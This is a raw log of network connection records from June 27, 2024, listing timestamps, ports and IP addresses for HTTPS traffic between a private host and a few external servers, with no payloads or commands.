Jun 27, 2024 05:58:33.072597027 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.072614908 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.073055029 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.073081970 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.073122025 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.073137999 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.073168039 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.073770046 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.073771954 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.073793888 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.073826075 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.073832989 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.073860884 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.073873043 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.073904991 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.073944092 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.074430943 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.074454069 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.074501991 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.074523926 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.074548960 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.074681997 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.075341940 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.075361967 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.075407982 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.075422049 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.075447083 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.075468063 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.076075077 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.076101065 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.076145887 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.076159954 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.076189041 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.076205015 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.087538004 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.102313042 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.102340937 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.102387905 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.102427959 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.102457047 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.102615118 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.107695103 CEST	443	49710	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:33.107796907 CEST	443	49710	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:33.107990026 CEST	49710	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:33.111392975 CEST	49710	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:33.111428976 CEST	443	49710	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:33.135906935 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.135931969 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.135977983 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.135988951 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.136015892 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.136028051 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.164894104 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.164930105 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.164988995 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.165025949 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.165050983 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.165173054 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.165680885 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.165700912 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.165749073 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.165764093 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.165796995 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.165973902 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.166100979 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.166124105 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.166162968 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.166177988 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.166213036 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.166240931 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.167045116 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.167069912 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.167139053 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.167152882 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.167192936 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.167213917 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.167659044 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.167682886 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.167717934 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.167732000 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.167757034 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.167798042 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.168230057 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.168252945 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.168301105 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.168314934 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.168339968 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.168360949 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.184602976 CEST	49720	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:33.184624910 CEST	443	49720	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:33.184792042 CEST	49720	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:33.185058117 CEST	49720	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:33.185072899 CEST	443	49720	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:33.194830894 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.194856882 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.194900036 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.194919109 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.194952011 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.194972038 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.230256081 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.230281115 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.230350018 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.230360031 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.230391026 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.230410099 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.257570982 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.257592916 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.257643938 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.257652998 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.257682085 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.257694960 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.258085966 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.258110046 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.258146048 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.258153915 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.258183956 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.258203983 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.258636951 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.258661032 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.258707047 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.258713961 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.258738041 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.258758068 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.259263039 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.259285927 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.259320021 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.259326935 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.259355068 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.259367943 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.259576082 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.259601116 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.259629965 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.259635925 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.259665012 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.259680986 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.260337114 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.260361910 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.260401964 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.260411024 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.260442972 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.260476112 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.287879944 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.287906885 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.287960052 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.287970066 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.288008928 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.322711945 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.322737932 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.322809935 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.322820902 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.322854996 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.322876930 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.350028038 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.350053072 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.350120068 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.350133896 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.350167036 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.350188971 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.350698948 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.350720882 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.350763083 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.350769997 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.350801945 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.350820065 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.351264954 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.351288080 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.351322889 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.351330042 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.351371050 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.351888895 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.351914883 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.351955891 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.351968050 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.351994038 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.352014065 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.352615118 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.352638960 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.352690935 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.352698088 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.352737904 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.353173018 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.353197098 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.353240013 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.353247881 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.353264093 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.353286028 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.380513906 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.380537033 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.380594969 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.380614042 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.380640984 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.380666971 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.415409088 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.415474892 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.415503025 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.415534019 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.415559053 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.415738106 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.420020103 CEST	49708	443	192.168.2.7	13.85.23.86
Jun 27, 2024 05:58:33.420046091 CEST	443	49708	13.85.23.86	192.168.2.7
Jun 27, 2024 05:58:33.420120955 CEST	49708	443	192.168.2.7	13.85.23.86
Jun 27, 2024 05:58:33.420130014 CEST	443	49708	13.85.23.86	192.168.2.7
Jun 27, 2024 05:58:33.442848921 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.442910910 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.442944050 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.442974091 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.442986965 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.443018913 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.443870068 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.443897009 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.443942070 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.443964005 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.443977118 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.444009066 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.444050074 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.444783926 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.444808006 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.444842100 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.444852114 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.444875002 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.445453882 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.445483923 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.445512056 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.445519924 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.445548058 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.446160078 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.446187019 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.446217060 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.446225882 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.446259975 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.472229958 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.473378897 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.473428011 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.473453999 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.473462105 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.473496914 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.508085012 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.508111000 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.508151054 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.508169889 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.508229017 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.535316944 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.535340071 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.535392046 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.535419941 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.535451889 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.536062956 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.536096096 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.536128044 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.536144972 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.536171913 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.536676884 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.536700964 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.536744118 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.536766052 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.536789894 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.537244081 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.537283897 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.537309885 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.537339926 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.537372112 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.538125992 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.538149118 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.538188934 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.538208961 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.538237095 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.538623095 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.538650990 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.538691044 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.538711071 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.538733959 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.565545082 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.565570116 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.565608978 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.565654039 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.565676928 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.600833893 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.600873947 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.600925922 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.600944996 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.600971937 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.630181074 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630206108 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630258083 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.630301952 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630332947 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.630342960 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630368948 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630404949 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.630419970 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630446911 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.630527973 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630546093 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630589008 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630589008 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.630604029 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630611897 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.630634069 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630654097 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.630671024 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.630697966 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.630743980 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.631131887 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.631153107 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.631201982 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.631217957 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.631242990 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.631261110 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.631628990 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.631653070 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.631695032 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.631707907 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.631736040 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.631755114 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.642735004 CEST	443	49720	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:33.643091917 CEST	49720	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:33.643110037 CEST	443	49720	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:33.643454075 CEST	443	49720	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:33.643757105 CEST	49720	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:33.643817902 CEST	443	49720	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:33.644130945 CEST	49720	443	192.168.2.7	172.67.167.249
Jun 27, 2024 05:58:33.658441067 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.658467054 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.658524036 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.658539057 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.658565044 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.658586025 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.688505888 CEST	443	49720	172.67.167.249	192.168.2.7
Jun 27, 2024 05:58:33.693308115 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.693331957 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.693427086 CEST	49709	443	192.168.2.7	31.31.196.208
Jun 27, 2024 05:58:33.693509102 CEST	443	49709	31.31.196.208	192.168.2.7
Jun 27, 2024 05:58:33.693547010 CEST	49709	443	192.168.2.7	31.31.196.208
